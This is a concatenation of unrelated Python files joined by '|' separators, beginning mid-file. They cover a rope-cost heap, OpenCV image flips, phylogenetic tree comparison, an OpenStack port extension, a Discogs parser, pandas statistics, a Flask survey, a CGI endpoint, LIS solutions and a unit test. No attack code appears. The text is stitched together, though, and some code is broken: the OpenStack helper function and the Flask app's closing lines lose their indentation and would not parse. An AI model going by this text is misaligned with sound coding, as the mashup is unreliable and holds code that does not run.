if __name__ == "__main__":
    main()
|
import heapq
# def __init__(self):
# self.cost = 0
def connectRopes(ropes):
    """Return the minimum total cost of joining all ropes into one.

    Joining two ropes costs the sum of their lengths; always joining the two
    shortest remaining ropes (min-heap greedy) minimises the total.
    """
    heap = list(ropes)
    heapq.heapify(heap)
    total = 0
    while len(heap) > 1:
        combined = heapq.heappop(heap) + heapq.heappop(heap)
        total += combined
        heapq.heappush(heap, combined)
    return total
# Smoke checks: expected minimum join costs are 19 and 224.
print(connectRopes([1, 18]))
print(connectRopes([1, 2, 5, 10, 35, 89]))
|
# coding: utf-8
# In[1]:
import numpy as np
import cv2
import imutils
# In[2]:
# Load the sample image and show it; any keypress advances to the next window.
img = cv2.imread('./datasets/flower1.jpg')
cv2.imshow("Original_Image", img)
cv2.waitKey(0)
# In[3]:
#Flipping Horizontally (flip code 1 = mirror around the vertical axis)
flip_horizontal = cv2.flip(img, 1)
cv2.imshow("Image_Flipped_Horizontal", flip_horizontal)
cv2.waitKey(0)
# In[4]:
#Flipping Vertically (flip code 0 = mirror around the horizontal axis)
flip_vertical = cv2.flip(img, 0)
cv2.imshow('Image_Flipped_Vertically', flip_vertical)
cv2.waitKey(0)
# In[5]:
#Flip along both the axes (flip code -1 = 180-degree rotation)
flip_both = cv2.flip(img, -1)
cv2.imshow("Flip_Both_Axes", flip_both)
cv2.waitKey(0)
# In[ ]:
|
import sys
import os
from ete3 import Tree
def str_2(ll):
    """Format a number with exactly two decimal places."""
    return "%.2f" % ll
def str_4(ll):
    """Format a number with exactly four decimal places."""
    return "%.4f" % ll
def print_likelihood_sums(treerecs_file):
    """Sum the ALE and libpll log-likelihoods found in a treerecs log and
    print their joint total.

    Each line is scanned for the token "logLk"; the library name precedes it
    and the value (carrying a trailing separator to strip) sits two tokens
    after it.

    Fix: the log file handle was never closed; it is now managed with `with`.
    """
    ale_ll = 0.0
    pll_ll = 0.0
    with open(treerecs_file) as logfile:
        for line in logfile:
            split = line.split(" ")
            for index, val in enumerate(split):
                if (val == "logLk"):
                    if (split[index - 1] == "ALE"):
                        ale_ll += float(split[index + 2][:-1])
                    elif (split[index - 1] == "libpll"):
                        pll_ll += float(split[index + 2][:-1])
    print("Total joint ll: " + str_2(pll_ll + ale_ll))
def get_rf(tree1, tree2):
    """Absolute Robinson-Foulds distance between two unrooted trees."""
    result = tree1.robinson_foulds(tree2, unrooted_trees=True)
    return result[0]
def get_relative_rf(tree1, tree2):
    """RF distance normalised by the maximum possible RF distance."""
    rf_result = tree1.robinson_foulds(tree2, unrooted_trees=True)
    distance, max_distance = rf_result[0], rf_result[1]
    return float(distance) / float(max_distance)
def read_list_trees(newick):
    """Read one tree per line from a newick file, skipping ">"-prefixed headers.

    :return: list of ete3 Tree objects, or None if the file cannot be read or
             a line fails to parse.

    Fixes: the file handle is closed via `with` even on parse errors, and the
    bare `except:` (which also swallowed SystemExit/KeyboardInterrupt) is
    narrowed to `except Exception`.
    """
    try:
        trees = []
        with open(newick) as lines:
            for line in lines:
                if (line.startswith(">")):
                    continue
                trees.append(Tree(line, format=1))
        return trees
    except Exception:
        return None
def build_rf_list(trees1, trees2):
    """Pairwise absolute RF distances between two equally-long tree lists."""
    return [get_rf(a, b) for a, b in zip(trees1, trees2)]
def build_relative_rf_list(trees1, trees2):
    """Pairwise relative RF distances between two equally-long tree lists."""
    return [get_relative_rf(a, b) for a, b in zip(trees1, trees2)]
def analyze_correctness(trees1, trees2, tree2_file, name):
    """Compare inferred trees against the true trees and print RF statistics.

    :param trees1: list of true trees
    :param trees2: list of inferred trees, or None when the file was unreadable
    :param tree2_file: log file of the inference run, parsed for likelihoods
    :param name: label used in the printed report

    Fix: `trees2 == None` replaced with the identity check `trees2 is None`
    (rich comparison against every tree list element was never the intent).
    """
    print("")
    print("## Analysing " + name + " trees...")
    if trees2 is None:
        print("No trees")
        return
    relative_rf_list = build_relative_rf_list(trees1, trees2)
    relative_rf_average = sum(relative_rf_list) / float(len(relative_rf_list))
    rf_list = build_rf_list(trees1, trees2)
    rf_average = sum(rf_list) / float(len(rf_list))
    exactness_frequency = rf_list.count(0.0) / float(len(rf_list))
    print("Average relative RF with true trees: " + str_4(relative_rf_average))
    print("Average RF with true trees: " + str_4(rf_average))
    print(str_2(exactness_frequency * 100) + "% of the trees exactly match the true trees")
    print_likelihood_sums(tree2_file)
# CLI entry: compare RAxML and Treerecs trees against the true trees.
if (len(sys.argv) != 4 and len(sys.argv) != 5):
    print("Syntax: python raxml_vs_trecs.py true_trees raxml_trees best_treerecs_trees [tree_analysis_dir]")
    sys.exit(1)
#true_trees = read_list_trees("/hits/basement/sco/morel/github/datasets/simuls/trueGeneTrees.newick")
#raxml_trees = read_list_trees("/hits/basement/sco/morel/github/datasets/simuls/geneTrees.newick")
#treerecs_trees = read_list_trees("/hits/basement/sco/morel/github/phd_experiments/results/treerecs/launch_treerecs/simuls/haswell_16/run_0/treerecs_output.newick.best")
true_trees_file = sys.argv[1]
raxml_trees_file = sys.argv[2]
treerecs_trees_file = sys.argv[3]
true_trees = read_list_trees(true_trees_file)
raxml_trees = read_list_trees(raxml_trees_file)
# Treerecs writes two outputs: <file>.best and <file>.tree_search.
treerecs_trees_file_best = treerecs_trees_file + ".best"
treerecs_trees_file_treesearch = treerecs_trees_file + ".tree_search"
treerecs_trees_best = read_list_trees(treerecs_trees_file_best)
treerecs_trees_treesearch = read_list_trees(treerecs_trees_file_treesearch)
# NOTE(review): 0 doubles as a "not provided" sentinel for a directory path.
threshold_trees_dir = 0
if (len(sys.argv) == 5):
    threshold_trees_dir = sys.argv[4]
analyze_correctness(true_trees, raxml_trees, raxml_trees_file, "RAXML")
analyze_correctness(true_trees, treerecs_trees_best, treerecs_trees_file_best, "TREERECS BEST THRESHOLD")
analyze_correctness(true_trees, treerecs_trees_treesearch, treerecs_trees_file_treesearch, "TREERECS TREE SEARCH")
# Optionally analyse every per-threshold tree file in the extra directory.
if (threshold_trees_dir != 0):
    per_threshold_files = os.listdir(threshold_trees_dir)
    for per_threshold_file in per_threshold_files:
        threshold_trees = read_list_trees(os.path.join(threshold_trees_dir, per_threshold_file))
        analyze_correctness(true_trees, threshold_trees, os.path.join(threshold_trees_dir, per_threshold_file), per_threshold_file)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Port extension implementations
"""
from cliff import hooks
from osc_lib.cli import parseractions
from openstack.network.v2 import port as port_sdk
from openstack import resource
from openstackclient.i18n import _
from openstackclient.network.v2 import port
_get_attrs_port_new = port._get_attrs
def _convert_erspan_config(parsed_args):
ops = []
for opt in parsed_args.apic_erspan_config:
addr = {}
addr['dest_ip'] = opt['dest-ip']
addr['flow_id'] = opt['flow-id']
if 'direction' in opt:
addr['direction'] = opt['direction']
ops.append(addr)
return ops
def _get_attrs_port_extension(client_manager, parsed_args):
    """
    Wrap the stock port attribute builder and fold in APIC ERSPAN settings.

    Delegates to the original ``port._get_attrs`` (saved above as
    ``_get_attrs_port_new``), then sets or clears 'apic:erspan_config'.
    """
    attrs = _get_attrs_port_new(client_manager, parsed_args)
    erspan_key = 'apic:erspan_config'
    if parsed_args.apic_erspan_config:
        attrs[erspan_key] = _convert_erspan_config(parsed_args)
    if parsed_args.no_apic_erspan_config:
        attrs[erspan_key] = []
    return attrs
# Monkey-patch the openstackclient port module so all port commands pick up
# the ERSPAN-aware attribute builder.
port._get_attrs = _get_attrs_port_extension
# Register the APIC extension attributes on the SDK Port resource so they are
# serialized to/from the API body.
port_sdk.Port.apic_synchronization_state = resource.Body(
    'apic:synchronization_state')
port_sdk.Port.apic_erspan_config = resource.Body('apic:erspan_config')
class CreateAndSetPortExtension(hooks.CommandHook):
    """Command hook adding APIC ERSPAN options to port create/set commands."""

    def get_parser(self, parser):
        """Add --apic-erspan-config / --no-apic-erspan-config arguments."""
        parser.add_argument(
            '--apic-erspan-config',
            metavar="<apic_erspan_config>",
            dest='apic_erspan_config',
            action=parseractions.MultiKeyValueAction,
            required_keys=['flow-id', 'dest-ip'],
            optional_keys=['direction'],
            help=_("APIC ERSPAN configuration\n"
                   "Custom data to be passed as apic:erspan_config\n"
                   "Data is passed as <key>=<value>, where "
                   "valid keys are 'flow-id', 'dest-ip', and 'direction'\n"
                   "Required keys: flow-id, dest-ip\n"
                   "Optional keys: direction\n"
                   "Syntax Example: dest-ip=10.0.0.0,flow-id=1 "
                   "or dest-ip=10.0.0.0,flow-id=1,direction=in ")
        )
        parser.add_argument(
            '--no-apic-erspan-config',
            dest='no_apic_erspan_config',
            action='store_true',
            help=_("No APIC ERSPAN configuration\n"
                   "Clear the apic:erspan_config configuration ")
        )
        return parser

    def get_epilog(self):
        """No extra epilog text for the command help."""
        return ''

    def before(self, parsed_args):
        """No-op pre-processing hook; arguments pass through unchanged."""
        return parsed_args

    def after(self, parsed_args, return_code):
        """No-op post-processing hook; return code passes through unchanged."""
        return return_code
class ShowPortExtension(hooks.CommandHook):
    """Command hook for port show; no extra CLI options, pure pass-through.

    Registering the hook is still required so the extension attributes added
    to the SDK Port resource above are displayed.
    """

    def get_parser(self, parser):
        """Return the parser unchanged (no extra options for show)."""
        return parser

    def get_epilog(self):
        """No extra epilog text for the command help."""
        return ''

    def before(self, parsed_args):
        """No-op pre-processing hook."""
        return parsed_args

    def after(self, parsed_args, return_code):
        """No-op post-processing hook."""
        return return_code
|
import re
import csv
import datetime
import dateutil
from dateutil.parser import parse
# xml input: change this path as needed based on where you're keeping the discogs xml dump
inputFile = './discogs_20161001_releases.xml'
# csv output: change this path based on where you want to write the csv
outputFile = open('./output.csv', 'w', newline='', encoding = 'utf-8')
outputWriter = csv.writer(outputFile)
# declare counters
numLines = 0
numRels = 0
numGenres = 0
numStyles = 0
numCountries = 0
numDates = 0
# declare data point lists...
# NOTE: these six lists are kept in lockstep — one entry is appended to each
# of allIds/allDates/allYears/allGenres/allStyles/allCountries per release
# (with "empty" as the placeholder), so they can be zipped row-wise into the CSV.
allIds = []
allDates = []
allYears = []
allGenres = []
allStyles = []
allCountries = []
currentDate = ""
# patterns to match for date / year processing
# (raw strings: "\d" inside a plain string is an invalid escape that raises a
# DeprecationWarning in Python 3)
datePatternA = re.compile(r"\d{4}-\d{2}-\d{2}")   # YYYY-MM-DD
datePatternB = re.compile(r"\d{4}")               # bare YYYY prefix (match() anchors at start)
datePatternC = re.compile(r"\d{2}/\d{2}/\d{2}")   # DD/MM/YY style
# for each line in the file, extract and store various data points
with open(inputFile, 'r', encoding='utf-8') as file:
    for line in file:
        numLines += 1
        if line.startswith('<release '):  # if the line is a release...
            numRels += 1
            allIds.append(line.split('<release id="')[1].split('" status=')[0])  # store the release ID
            if line.find('<genre>') != -1:  # store genre if exists
                numGenres += 1
                allGenres.append(line.split('<genre>')[1].split('</genre>')[0])
            else:
                allGenres.append("empty")
            if line.find('<style>') != -1:  # store style if exists
                numStyles += 1
                allStyles.append(line.split('<style>')[1].split('</style>')[0])
            else:
                allStyles.append("empty")
            if line.find('<country>') != -1:  # store country if exists
                numCountries += 1
                allCountries.append(line.split('<country>')[1].split('</country>')[0])
            else:
                allCountries.append("empty")
            if line.find('<released>') != -1:  # store release date, extract and store year if they exist
                numDates += 1
                currentDate = line.split('<released>')[1].split('</released>')[0]
                allDates.append(currentDate)
                if datePatternA.match(currentDate):
                    allYears.append(currentDate[:4])
                elif datePatternB.match(currentDate):
                    allYears.append(currentDate[:4])
                elif datePatternC.match(currentDate):
                    # BUG FIX: for "DD/MM/YY" the two-digit year starts at
                    # index 6; the original slice [5:] included the second
                    # separator and produced values like "/99".
                    allYears.append(currentDate[6:])
                else:
                    allYears.append("miss")  # if the regexes can't capture this date format, record a miss
            else:
                allDates.append("empty")
                allYears.append("empty")
# print some basic stats about the file
print ("Total lines: ", numLines)
print ("Total releases: ", numRels)
print ("Total release dates: ", numDates)
# if these totals aren't equal, there's an issue with the parsing
# (every per-release list must have received exactly one entry per release)
print (" ")
print ("These counts should be equal:")
print ("Collected release IDs: ", len(allIds))
print ("Collected genres: ", len(allGenres))
print ("Collected styles: ", len(allStyles))
print ("Collected countries: ", len(allCountries))
print ("Collected release dates: ", len(allDates))
print ("Parsed release years: ", len(allYears))
print (" ")
print ('Writing CSV...')
# write the index row on the csv
outputWriter.writerow(['id', 'genre', 'style', 'country', 'releaseDate', 'year'])
# write all parameters to csv, one row per release, zipping the parallel lists
for i in range(numRels):
    outputWriter.writerow([allIds[i], allGenres[i], allStyles[i], allCountries[i], allDates[i], allYears[i]])
# close the csv
outputFile.close()
# confirmation that process is complete yay!
print ('Success!')
|
from moduleassign import modules as m
# from mod import *
# List the names the imported module exposes (debug aid for the assignment).
print(dir(m))
#~ r = m.rangegenerator()
#~ print(r)
#~ reversedVals = m.reverser(r)
#~ print(reversedVals)
#~ evens = m.evener(r)
#~ print(evens)
#~ odds = m.odder(r)
#~ print(odds)
|
from django.contrib import admin
from .models import CustomUser as User
@admin.register(User)
class UserAdmin(admin.ModelAdmin):
    """Django admin configuration for the custom user model."""

    # Columns shown in the admin change-list view for users.
    list_display = ("username", "email", "plan", "is_staff", "is_active")
|
# Write a script called "stats.py" that prints the
# mean, median, mode, range, variance, and standard deviation
# for the Alcohol and Tobacco dataset with full text
# (ex. "The range for the Alcohol and Tobacco dataset is ...").
# Push the code to Github and enter the link below.
import pandas as pd
import pdb

data = '''Region, Alcohol, Tobacco
North, 6.47, 4.03
Yorkshire, 6.13, 3.76
Northeast, 6.19, 3.77
East Midlands, 4.89, 3.34
West Midlands, 5.63, 3.47
East Anglia, 4.52, 2.92
Southeast, 5.89, 3.20
Southwest, 4.79, 2.71
Wales, 5.27, 3.53
Scotland, 6.08, 4.51
Northern Ireland, 4.02, 4.56'''

# First, split the string on the (hidden characters that indicate) newlines
data = data.splitlines()  # we could also do data.split('\n')
# Then, split each item in this list on the commas
# (the bracketed expression is a list comprehension)
data = [i.split(', ') for i in data]

# Now create a pandas dataframe: first row is the header, the rest is data.
column_names = data[0]
data_rows = data[1::]
df = pd.DataFrame(data_rows, columns=column_names)
df['Alcohol'] = df['Alcohol'].astype(float)
df['Tobacco'] = df['Tobacco'].astype(float)
#pdb.set_trace() #debugger

# Alcohol statistics.
alcr = max(df['Alcohol']) - min(df['Alcohol'])
alcm = df['Alcohol'].mean()
# BUG FIX: the exercise asks for median and mode, but neither was computed.
alcmd = df['Alcohol'].median()
alcmo = df['Alcohol'].mode().tolist()  # mode() returns a Series (all values when no repeats)
alcs = df['Alcohol'].std()
alcv = df['Alcohol'].var()

# Tobacco statistics.
tobr = max(df['Tobacco']) - min(df['Tobacco'])
tobm = df['Tobacco'].mean()
tobmd = df['Tobacco'].median()
tobmo = df['Tobacco'].mode().tolist()
tobs = df['Tobacco'].std()
tobv = df['Tobacco'].var()

# BUG FIX: the original used Python 2 `print` statements, which are a
# SyntaxError under Python 3; converted to print() calls with the full-text
# phrasing the exercise requires.
print("The mean for the Alcohol dataset is", alcm)
print("The median for the Alcohol dataset is", alcmd)
print("The mode for the Alcohol dataset is", alcmo)
print("The range for the Alcohol dataset is", alcr)
print("The standard deviation for the Alcohol dataset is", alcs)
print("The variance for the Alcohol dataset is", alcv)
print("The mean for the Tobacco dataset is", tobm)
print("The median for the Tobacco dataset is", tobmd)
print("The mode for the Tobacco dataset is", tobmo)
print("The range for the Tobacco dataset is", tobr)
print("The standard deviation for the Tobacco dataset is", tobs)
print("The variance for the Tobacco dataset is", tobv)
|
from flask import Flask, session, app, render_template, request, Markup
import sys, io, re
import os, base64
from io import StringIO
from datetime import datetime
import time
app = Flask(__name__)
# get root path for account in cloud
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# survey page
@app.route("/", methods=['POST', 'GET'])
def survey_page():
    """Render the survey form; on POST, validate answers and append them to a CSV.

    GET  -> empty form.
    POST -> if required answers are missing, re-render with an error message and
            the user's previous inputs preserved; otherwise append a timestamped
            row to surveys/survey_samp_1.csv and show a thank-you message.
    """
    message = ''
    first_name = ''
    last_name = ''
    email = ''
    gender = ''
    are_you_happy = 'Choose one...'
    tell_us_more = ''
    Family_checked = ''
    Friends_checked = ''
    Colleagues_checked = ''
    # this is a list so create a string to append into csv file
    recommend_this_to_string = ''
    if request.method == 'POST':
        # check that we have all the required fields to append to file
        are_you_happy = request.form['are_you_happy']
        recommend_this_to = request.form.getlist('recommend_this_to')
        tell_us_more = request.form['tell_us_more']
        # remove special characters from input for security
        # NOTE(review): this strips spaces and punctuation too, not just
        # "special" characters — confirm that is intentional.
        tell_us_more = re.sub(r"[^a-zA-Z0-9]","",tell_us_more)
        first_name = request.form['first_name']
        last_name = request.form['last_name']
        email = request.form['email']
        date_of_birth = request.form['date_of_birth']
        # optional fields
        if date_of_birth=='':
            date_of_birth = 'NA'
        if 'gender' in request.form:
            gender = request.form['gender']
        else:
            gender = 'NA'
        # check that essential fields have been filled
        message = ''
        missing_required_answers_list = []
        if are_you_happy == 'Choose one...':
            missing_required_answers_list.append('Are you happy?')
        if len(recommend_this_to) == 0:
            missing_required_answers_list.append('Who would you recommend this survey to?')
        else:
            # remember which checkboxes were ticked so the form re-renders them
            for val in recommend_this_to:
                recommend_this_to_string += val + ' '
                if val == 'Family':
                    Family_checked = 'checked'
                if val == 'Friends':
                    Friends_checked = 'checked'
                if val == 'Colleagues':
                    Colleagues_checked = 'checked'
        if tell_us_more == '':
            missing_required_answers_list.append('Tells us more')
        if first_name == '':
            missing_required_answers_list.append('First name')
        if last_name == '':
            missing_required_answers_list.append('Last name')
        if email == '':
            missing_required_answers_list.append('Email')
        if len(missing_required_answers_list) > 0:
            # return back a string with missing fields
            message = '<div class="w3-row-padding w3-padding-16 w3-center"><H3>You missed the following question(s):</H3><font style="color:red;">'
            for ms in missing_required_answers_list:
                message += '<BR>' + str(ms)
            message += '</font></div>'
        else:
            # append survey answers to file
            # create a unique timestamp for this entry
            entry_time = datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
            # save to file and send thank you note
            # NOTE(review): first_name and gender are collected and validated
            # but never written to the CSV row below — confirm whether intentional.
            with open(BASE_DIR + '/surveys/survey_samp_1.csv','a+') as myfile: # use a+ to append and create file if it doesn't exist
                myfile.write(
                    str(entry_time) + ',' +
                    str(last_name) + ',' +
                    str(email) + ',' +
                    str(date_of_birth) + ',' +
                    str(are_you_happy) + ',' +
                    str(recommend_this_to_string) + ',' +
                    str(tell_us_more) + ','
                    + '\n')
            # return thank-you message
            message = '<div class="w3-row-padding w3-padding-16 w3-center"><H2><font style="color:blue;">Thank you for taking the time to complete this survey</font></H2></div>'
    # re-render the form with whatever state we have (message may be empty on GET)
    return render_template('survey.html',
        message = Markup(message),
        first_name = first_name,
        last_name = last_name,
        email = email,
        gender = gender,
        tell_us_more = tell_us_more,
        Family_checked = Family_checked,
        Friends_checked = Friends_checked,
        Colleagues_checked = Colleagues_checked,
        are_you_happy = are_you_happy)
# used only in local mode
if __name__=='__main__':
app.run(debug=True)
|
# -*- coding: utf-8 -*-
import os, sys, re, codecs, binascii, cgi, cgitb, datetime, pickle
from msg import *
import json
cgitb.enable()
sys.stdout = codecs.getwriter('utf-8')(sys.stdout.detach())
def main():
    """Handle a CGI request: emit a JSON content-type header and a fixed JSON payload."""
    q = cgi.FieldStorage()  # parsed for side effects; fields are not used here
    # BUG FIX: the header said "application-json"; the correct MIME type
    # separator is a slash: "application/json".
    print("Content-type: application/json; charset=utf-8\n\n")
    r = {'ids': [["one", 1], ["two", 2]]}
    print(json.dumps(r))
main()
|
# -*- encoding:utf-8 -*-
# __author__=='Gan'
# Given an unsorted array of integers, find the length of longest increasing subsequence.
# For example,
# Given [10, 9, 2, 5, 3, 7, 101, 18],
# The longest increasing subsequence is [2, 3, 7, 101], therefore the length is 4.
# Note that there may be more than one LIS combination, it is only necessary for you to return the length.
# Your algorithm should run in O(n2) complexity.
# Follow up: Could you improve it to O(n log n) time complexity?
# Credits:
# Special thanks to @pbrother for adding this problem and creating all test cases.
# 24 / 24 test cases passed.
# Status: Accepted
# Runtime: 1468 ms
# Your runtime beats 6.41 % of python submissions.
# DP Formula: DP[i] = max(DP[j] + 1, DP[i]), nums[j] is all numbers that bigger than the nums[i].
class Solution(object):
    def lengthOfLIS(self, nums):
        """
        Length of the longest strictly increasing subsequence, O(n^2) DP.

        dp[i] = length of the longest increasing subsequence *starting* at
        index i; filled right-to-left.

        :type nums: List[int]
        :rtype: int
        """
        if not nums:
            return 0
        dp = len(nums) * [1]
        # FIX: start at len(nums) - 1.  The original started at len(nums),
        # a wasted first iteration whose inner range was empty; the inner
        # range also starts at i + 1 now (j == i could never satisfy
        # nums[i] < nums[i]).  Behavior is unchanged.
        for i in range(len(nums) - 1, -1, -1):
            for j in range(i + 1, len(nums)):
                if nums[i] < nums[j]:
                    dp[i] = max(dp[j] + 1, dp[i])
        return max(dp)
# O(n log n): patience-sorting idea with a hand-rolled binary search.
class Solution(object):
    def lengthOfLIS(self, nums):
        """
        Length of the longest strictly increasing subsequence.

        piles[k] holds the smallest possible tail of an increasing
        subsequence of length k + 1; each value replaces the leftmost
        tail that is >= it (found by binary search), extending the
        frontier when it is larger than every current tail.
        """
        piles = [0] * len(nums)
        length = 0
        for value in nums:
            lo, hi = 0, length
            # Find the leftmost pile whose tail is >= value.
            while lo < hi:
                mid = (lo + hi) // 2
                if piles[mid] < value:
                    lo = mid + 1
                else:
                    hi = mid
            piles[lo] = value
            if lo == length:
                length += 1
        return length
# Runtime: 48 ms
if __name__ == '__main__':
    # Smoke tests; note this exercises the *second* Solution class, which
    # shadows the O(n^2) one defined above it.
    print(Solution().lengthOfLIS([10, 9, 2, 5, 3, 7, 101, 18]))
    print(Solution().lengthOfLIS([10,9,2,5,3,4]))
    print(Solution().lengthOfLIS([]))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
import numpy as np
import os
import unittest
from scipy import linalg
from .. import auxfn_vers2 as auxfn
from ..model.io_triangle import IOTriangle as green
from . import test_tools
currentdir = os.path.join(os.getcwd(), "mea/tests")
@unittest.skip("This class is equivalent to GFAux.")
class TestGFAuxC(unittest.TestCase):
    """Tests for the auxiliary Green function class (GFAuxC).

    If input is given as a sE (self-energy) file of a cluster, the class
    builds an auxiliary GF (for real or complex frequencies; imaginary
    frequencies are implicit).  If an auxiliary Green function file is given
    instead, it can extract the self-energy (the frequencies are then
    implicitly on the real axis).

    The whole class is skipped: it duplicates the GFAux test suite.
    """
    @classmethod
    def setUpClass(TestGFAux):
        # NOTE(review): the first parameter is conventionally named `cls`.
        print("\nIn testauxfn_vers2.\n")
    def test_init(self):
        """Constructor wires up default file names and the zn column index."""
        fin_sE_to = os.path.join(currentdir, "files/self_moy.dat")
        gf_aux = auxfn.GFAuxC(fin_sE_to=fin_sE_to)
        self.assertEqual(gf_aux.zn_col, 0)
        self.assertEqual(gf_aux.fin_sE_to, fin_sE_to)
        self.assertEqual(gf_aux.fout_sE_ctow, "self_ctow.dat")
        self.assertEqual(gf_aux.fout_gf_aux_to, "gf_aux_to.dat")
    def test_build_gfvec_aux(self):
        """Build the auxiliary GF from a short sE file and compare against
        values assembled by hand from the same file."""
        mu = 2.1
        fin_sE_to = os.path.join(currentdir, "files/self_short_moy.dat")
        gf_aux = auxfn.GFAuxC(fin_sE_to=fin_sE_to, mu=mu)
        gf_aux2 = auxfn.GFAuxC(fin_sE_to=fin_sE_to, rm_sE_ifty=True, mu=mu)
        gf_aux.build_gfvec_aux()
        gf_aux2.build_gfvec_aux()
        # Hand-copied reference data from files/self_short_moy.dat.
        zn_vec = np.array([5.235989e-002, 1.570800e-001, 2.6179900e-001, 1.5027299e+001])
        sE_t = np.array([
            [ 7.29148945e+00 -1.25688297e+00j, 4.31791692e+00 -7.37366863e-01j,
             -4.37618486e+00 +7.44382438e-01j, 6.02348575e+00 -9.90968651e-01j,
             4.05606418e+00 -4.07146712e-01j, 2.59560959e-01 -3.97514439e-03j],
            [ 6.37534240e+00 -3.08656815e+00j , 3.92112500e+00 -1.86394356e+00j,
             -3.80134014e+00 +1.78496589e+00j , 5.15813767e+00 -2.33078630e+00j,
             3.66679027e+00 -9.42835945e-01j ,2.35758219e-01 -9.62837241e-03j],
            [ 5.42233260e+00 -4.06248226e+00j , 3.52542822e+00 -2.58309048e+00j,
             -3.22922418e+00 +2.29211959e+00j , 4.28316747e+00 -2.88633370e+00j,
             3.28618116e+00 -1.15036779e+00j , 2.02677966e-01 -1.32361189e-02j],
            [ 5.55747767e+00 -2.25696764e+00j , 5.68107370e+00 -2.11065758e+00j,
             -2.65143495e-01 +3.18872569e-02j , 6.68961495e-02 +1.31238862e-02j,
             7.97463733e-02 +5.27132295e-02j , 3.05312358e-03 -2.81419793e-02j]
            ]
            )
        # Assemble the 4x4 cluster self-energy matrices from the column data,
        # exploiting the symmetry pattern of the cluster.
        sEvec_c = np.zeros((zn_vec.shape[0], 4, 4), dtype=complex)
        sEvec_c[:, 0, 0] = sE_t[:, 0] ; sEvec_c[:, 0, 1] = sE_t[:, 2] ; sEvec_c[:, 0, 2] = sE_t[:, 3] ; sEvec_c[:, 0, 3] = sE_t[:, 2]
        sEvec_c[:, 1, 0] = sEvec_c[:, 0, 1]; sEvec_c[:, 1, 1] = sE_t[:, 1] ; sEvec_c[:, 1, 2] = sEvec_c[:, 0, 1] ; sEvec_c[:, 1, 3] = sE_t[:, 4]
        sEvec_c[:, 2, 0] = sEvec_c[:, 0, 2] ; sEvec_c[:, 2, 1] = sEvec_c[:, 1, 2] ; sEvec_c[:, 2, 2] = sEvec_c[:, 0, 0] ; sEvec_c[:, 2, 3] = sEvec_c[:, 0, 1]
        sEvec_c[:, 3, 0] = sEvec_c[:, 0, 3] ; sEvec_c[:, 3, 1] = sEvec_c[:, 1, 3] ; sEvec_c[:, 3, 2] = sEvec_c[:, 2, 3] ; sEvec_c[:, 3, 3] = sEvec_c[:, 1, 1]
        sEvec_ir = green().c_to_ir(sEvec_c)
        sE_ifty = green().read_green_infty(sEvec_ir)
        # now let us form the gf_aux
        gfvec_test_c = np.zeros((zn_vec.shape[0], 4, 4), dtype=complex)
        gfvec_test_ir = gfvec_test_c.copy()
        for (i, sE) in enumerate(sEvec_c.copy()):
            zz = 1.0j*zn_vec[i] + mu
            gfvec_test_c[i] = linalg.inv(np.eye(4)*zz - sE)
        gfvec_test_ir = green().c_to_ir(gfvec_test_c)
        try:
            np.testing.assert_allclose(gf_aux.zn_vec, zn_vec, rtol=1e-7, atol=1e-7)
            np.testing.assert_allclose(gf_aux.sEvec_c, sEvec_c, rtol=1e-7, atol=1e-7)
            np.testing.assert_allclose(gf_aux.sE_infty, sE_ifty, rtol=1e-7, atol=1e-7)
            np.testing.assert_allclose(gf_aux.sEvec_c[:, 3, 3], sE_t[:, 1], rtol=1e-7, atol=1e-7)
            np.testing.assert_allclose(gf_aux.gfvec_aux_c.shape, gfvec_test_c.shape, rtol=1e-7, atol=1e-7)
            # np.testing.assert_allclose(gf_aux.gfvec_aux_c, gfvec_test_c, rtol=1e-7, atol=1e-7)
            # np.testing.assert_allclose(gf_aux2.gfvec_aux_ir, gfvec_test_ir, rtol=1e-7, atol=1e-7)
            # np.testing.assert_allclose(gf_aux.gfvec_aux_ir, gfvec_test_ir2, rtol=1e-7, atol=1e-7)
        except AssertionError:
            self.fail("ayaya np.allclose failed at test_build_gf_aux")
    # def test_ac(self):
    #     """ """
    #     fin_sE_to = os.path.join(currentdir, "files/self_moyb60U3n05.dat")
    #     gf_aux = auxfn.GFAux(fin_sE_to=fin_sE_to, rm_sE_ifty=False)
    #     gf_aux.build_gfvec_aux()
    #     gf_aux.ac(fin_OME_default=os.path.join(currentdir, "files/OME_default.dat"), \
    #               fin_OME_other=os.path.join(currentdir, "files/OME_other.dat"), \
    #               fin_OME_input=os.path.join(currentdir, "files/OME_input_test.dat")
    #               )
    #     # gf_aux.get_sE_w_list() put this line in the next test
    #     Aw_manual_small_truncation = np.loadtxt(os.path.join(currentdir,"files/Aw_manual_small_truncation.dat"))
    #     w_n_manual = Aw_manual_small_truncation[:, 0]
    #     Aw_manual = np.delete(Aw_manual_small_truncation,0, axis=1)
    #     w_n =gf_aux.w_vec_list[0]
    #     Aw = gf_aux.Aw_t_list[0][:, 0][:, np.newaxis]
    #     # print("Aw.shape = ", Aw.shape)
    #     # print(Aw_manual.shape)
    #     try:
    #         np.testing.assert_allclose(w_n.shape, w_n_manual.shape)
    #         np.testing.assert_allclose(Aw.shape, Aw_manual.shape)
    #         test_tools.compare_arrays(w_n, w_n_manual, rprecision=10**-2, n_diff_max=5, zero_equivalent=10**-5)
    #         test_tools.compare_arrays(Aw, Aw_manual, rprecision=10**-2, n_diff_max=5, zero_equivalent=10**-5)
    #     except AssertionError:
    #         self.fail("ayaya np.allclose failed at test_build_gf_aux")
    # def test_get_sEvec_w(self):
    #     """ """
    #     #print("\n\n IN test_get_sE_w \n\n")
    #     fin_sE_to = os.path.join(currentdir, "files/self_moy.dat")
    #     gf_aux = auxfn.GFAux(fin_sE_to=fin_sE_to, rm_sE_ifty=False)
    #     gf_aux.build_gfvec_aux()
    #     gf_aux.ac(fin_OME_default=os.path.join(currentdir, "files/OME_default.dat"), \
    #               fin_OME_other=os.path.join(currentdir, "files/OME_other.dat"), \
    #               fin_OME_input=os.path.join(currentdir, "files/OME_input_get_sE.dat")
    #               )
    #     gf_aux.get_sEvec_w_list()
